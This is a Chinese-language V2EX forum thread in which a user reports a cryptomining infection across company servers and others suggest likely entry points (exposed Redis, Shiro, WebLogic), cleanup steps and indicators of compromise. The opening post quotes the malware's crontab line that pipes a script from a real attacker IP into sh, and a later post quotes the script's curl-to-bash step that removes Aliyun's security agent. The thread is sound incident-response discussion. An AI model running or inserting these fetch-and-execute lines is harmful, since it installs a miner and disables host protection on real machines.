公司服务器被攻击了!

2021-11-01 12:42:43 +08:00
 leiuu

周六公司服务器被大面积攻击,植入挖矿程序,cpu 被打爆。

怀疑是通过某个开源框架的远程执行漏洞进来的,但不知道是从具体哪个机器进入。

该病毒基本特征:

* * * * * wget -q -O - http://185.191.32.198/spr.sh |sh > /dev/null 2>&1

涉及的服务器很多,v 友们有什么好的分析思路分享吗?

9289 次点击
所在节点    信息安全
53 条回复
melsp
2021-11-01 12:44:13 +08:00
我们公司防火墙和服务器也是打了,中了勒索……哎
leiuu
2021-11-01 12:46:47 +08:00
@melsp 也是最近吗? 搞定了吗。勒索就严重了。我们现在庆幸不是勒索。运维在疯狂加班。
sudoy
2021-11-01 13:17:50 +08:00
部署到云服务器会不会好一些
itemqq
2021-11-01 14:10:53 +08:00
之前个人的小鸡上遇到过类似的,是因为 redis 弱密码。。
LessonOne
2021-11-01 14:11:28 +08:00
这个我们公司的服务器也被植入挖矿病毒 好在只是挖矿而已,处理步骤 先把 网关了 再一个个把相关的进程文件删除 启动项删除 然后改 SSH 端口号 改密码 禁止远程 root 账号登录
sssbbb
2021-11-01 14:13:43 +08:00
服务器密码是否同一个?
itemqq
2021-11-01 14:13:56 +08:00
beshe
2021-11-01 14:15:15 +08:00
从 ops 和 opsz 用户运行的程序入手查查
sssbbb
2021-11-01 14:15:35 +08:00
shiro 、weblogic 、jboss 、struts2 等等很多的框架漏洞都可以直接拿服务器权限。
046569
2021-11-01 14:23:05 +08:00
有没有单独的日志服务器?如果转发了日志,可以根据日志回溯出攻击者如何攻破防御的。
如果只是网站框架漏洞,一般无法创建多个用户的定时任务,应该考虑是否还存在提权漏洞。
当然具体情况要具体分析,让运维和网安一起工作才是解决之道。
pixiaotiao
2021-11-01 14:26:14 +08:00
😂之前 jenkins 被注入过 后来关了 jenkins
Maco
2021-11-01 15:12:08 +08:00
我们之前的内网服务器被搞过相同的;后来查到原因是一个内网的 Redis 端口,被网管映射到公网 IP 上了,然后这 Redis 还没有密码。。。就被扫了。
narutots
2021-11-01 15:18:33 +08:00
之前遇到过,彻底清理后,基本原因就是 redis 密码和 shiro 版本
clf
2021-11-01 15:18:35 +08:00
除了 80 、443 、22 ,还开了什么端口。
leiuu
2021-11-01 16:09:03 +08:00
谢谢各位。redis 漏洞、scrapyd 漏洞、yarn 漏洞目前已知都可能被利用。开源框架果真有利有弊。。。
我再排查一下服务器日志。
另外这个 spr.sh 已经被我捕获到一份。感觉是针对阿里云的。获得权限进去后,先尝试用 curl http://update.aegis.aliyun.com/download/uninstall.sh | bash 卸载阿里云相关的东西。
0x73346b757234
2021-11-01 16:19:44 +08:00
刚大概看了下样本,spr.sh 被放进 crontab 用来定期一顿清理和杀别的进程,清理完最后会下载执行挖矿主体程序“kinsing.elf”。
从清理脚本看应该是有 root 权限,我觉得可以先看看服务器哪些应用是 root 跑的,缩小一下溯源范围。如果没有其他流量层和主机层的日志的话这个比较难去准确溯源调查。
我把关联的 IOC 整理了下,安全同事们看到这里顺便可以在自家的 NIDS/HIDS 里自查一下。

文件 Hash:
b099a4454a5ecc566f849747c14dec8accc96128f21cf228790a4b34d3ef1aea
75596a259a6cf7701da23e8220550216a559006acc2b8607aa9b0017e6c293d9
6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b

IP:
185.191.32.198
194.38.20.199

URL:
hxxp://194.38.20.199/kinsing
hxxp://194.38.20.199/spr.sh
hxxp://194.38.20.199/cron.sh
hxxp://185.191.32.198/spr.sh (疑似已失效)
q15158012160
2021-11-01 16:20:20 +08:00
显然是 ops 和 opsz 这两个用户的程序有问题。
建议是关闭外网的 ip ,需要开放公网的时候通过负载均衡映射。
virusdefender
2021-11-01 16:21:28 +08:00
不能再经典的挖矿了,可以买个主机安全产品检测防护一下。
WordTian
2021-11-01 16:22:55 +08:00
大概率 redis 对外了
leiuu
2021-11-01 16:32:36 +08:00
@0x73346b757234 感谢大佬。~~ 很有帮助。
这个 ip 简直一样,请问大佬怎么获取到这个 ip 的。 😭。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/812098

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX